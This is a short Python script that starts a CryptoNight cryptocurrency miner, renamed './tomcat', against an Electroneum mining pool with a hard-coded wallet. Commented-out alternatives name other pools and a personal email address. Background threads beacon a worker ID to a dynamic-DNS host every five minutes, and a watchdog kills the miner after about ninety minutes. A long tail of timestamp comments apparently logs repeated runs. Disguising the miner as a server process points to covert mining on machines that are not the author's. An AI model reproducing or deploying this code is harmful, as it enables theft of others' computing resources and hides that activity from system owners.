import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:03.630919
#2018-02-17 17:14:01.760012
#2018-02-17 19:02:07.252327
#2018-02-17 20:50:07.104934
#2018-02-17 22:36:07.474598
#2018-02-18 00:20:01.511390
#2018-02-18 02:11:02.081548
#2018-02-18 03:58:03.582716
#2018-02-18 05:48:03.466672
#2018-02-18 07:40:09.060164
#2018-02-18 09:27:07.639084
#2018-02-18 11:14:07.187321
#2018-02-18 13:01:01.495633
#2018-02-18 14:49:04.942364
#2018-02-18 16:37:04.324439
#2018-02-18 18:26:02.144324
#2018-02-18 20:13:05.881113
#2018-02-18 21:59:02.023902
#2018-02-18 23:48:01.928890
#2018-02-19 01:34:04.957364
#2018-02-19 03:22:01.517383
#2018-02-19 05:07:03.324864
#2018-02-19 06:52:04.848442
#2018-02-19 08:40:08.445284
#2018-02-19 10:29:05.549123
#2018-02-19 12:17:04.975930
#2018-02-19 14:03:07.623293
#2018-02-19 15:51:09.165615
#2018-02-19 17:39:04.772155
#2018-02-19 19:26:07.371339
#2018-02-19 21:14:05.977729
#2018-02-19 23:00:07.081431
#2018-02-20 00:45:09.376328
#2018-02-20 02:38:05.935603
#2018-02-20 04:27:07.815819
#2018-02-20 06:11:07.508040
#2018-02-20 07:56:05.076766
#2018-02-20 09:41:04.255215
#2018-02-20 11:25:10.616381
#2018-02-20 13:13:05.251607
#2018-02-20 14:59:06.879986
#2018-02-20 16:45:07.585678
#2018-02-20 18:34:01.915552
#2018-02-20 20:25:05.293460
#2018-02-20 22:10:10.310881
#2018-02-20 23:50:06.555217
#2018-02-21 01:37:07.672640
#2018-02-21 03:25:08.485488
#2018-02-21 05:13:05.779743
#2018-02-21 07:02:03.409936
#2018-02-21 08:47:03.677690
#2018-02-21 10:32:07.778228
#2018-02-21 12:21:04.373216
#2018-02-21 14:07:06.083152
#2018-02-21 15:53:04.626522
#2018-02-21 17:44:06.253952
#2018-02-21 19:31:06.424267
#2018-02-21 21:18:03.688160
#2018-02-21 23:04:05.086084
#2018-02-22 00:53:05.509208
#2018-02-22 02:41:06.443740
#2018-02-22 04:27:01.691396
#2018-02-22 06:12:03.730721
#2018-02-22 07:59:01.881196
#2018-02-22 09:48:05.741029
#2018-02-22 11:34:10.289152
#2018-02-22 13:21:01.795206
#2018-02-22 15:11:08.040863
#2018-02-22 16:55:05.147466
#2018-02-22 18:44:09.130643
#2018-02-22 20:35:04.170157
#2018-02-22 22:20:01.937919
#2018-02-23 00:06:05.013016
#2018-02-23 01:54:07.058993
#2018-02-23 03:46:07.215172
#2018-02-23 05:37:03.917728
#2018-02-23 07:22:05.437193
#2018-02-23 09:26:08.114731
#2018-02-23 11:31:07.555976
#2018-02-23 13:20:03.942970
#2018-02-23 15:06:01.475193
#2018-02-23 16:55:03.451003
#2018-02-23 18:43:08.627017
#2018-02-23 20:29:07.469197
#2018-02-23 22:16:05.719464
#2018-02-24 00:01:04.091665
#2018-02-24 01:50:09.034994
#2018-02-24 03:43:07.094343
#2018-02-24 05:32:08.084768
#2018-02-24 07:18:07.457634
#2018-02-24 09:08:05.245549
#2018-02-24 10:43:04.881891
#2018-02-24 12:33:05.008223
#2018-02-24 14:22:05.236732
#2018-02-24 16:09:03.378724
#2018-02-24 18:00:09.301600
#2018-02-24 19:48:05.658160
#2018-02-24 21:33:04.427471
#2018-02-25 00:20:08.491023
#2018-02-25 03:28:04.080290
#2018-02-25 06:20:01.472937
#2018-02-25 11:34:06.256032
#2018-02-25 13:13:01.975985
#2018-02-25 14:46:02.146504
#2018-02-25 16:19:01.492758